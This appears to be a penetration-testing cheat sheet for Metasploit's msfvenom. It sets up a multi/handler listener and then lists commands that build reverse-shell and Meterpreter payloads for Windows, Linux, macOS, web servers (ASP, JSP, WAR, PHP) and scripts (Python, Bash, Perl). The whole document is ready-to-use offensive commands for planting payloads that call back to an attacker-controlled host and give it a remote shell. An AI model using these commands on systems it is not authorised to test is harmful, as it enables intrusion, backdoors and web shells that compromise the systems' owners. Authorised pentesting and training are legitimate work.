Internal Infrastructure Pentest - msfvenom


 Handler on Msfconsole 
  - use exploit/multi/handler
  - set PAYLOAD windows/meterpreter/reverse_tcp
  - set LHOST localhost
  - set LPORT 4444
  - set ExitOnSession false
  - exploit -j -z

 Payload creation with Direct Access to OS 
- Windows:
  - msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe -o payload.exe
  
- Linux:
  - msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > payload.elf
  
- Mac:
  - msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > payload.macho

 Payload creation to exploit through web

- ASP:
  - msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > payload.asp
  
- JSP:
  - msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f jsp > payload.jsp
  
- WAR:
  - msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > payload.war

- PHP:
  - msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php
  
 Payload creation to exploit via scripting
  
- Python:
  - msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py

- Bash:
  - msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh

- Perl:
  - msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl
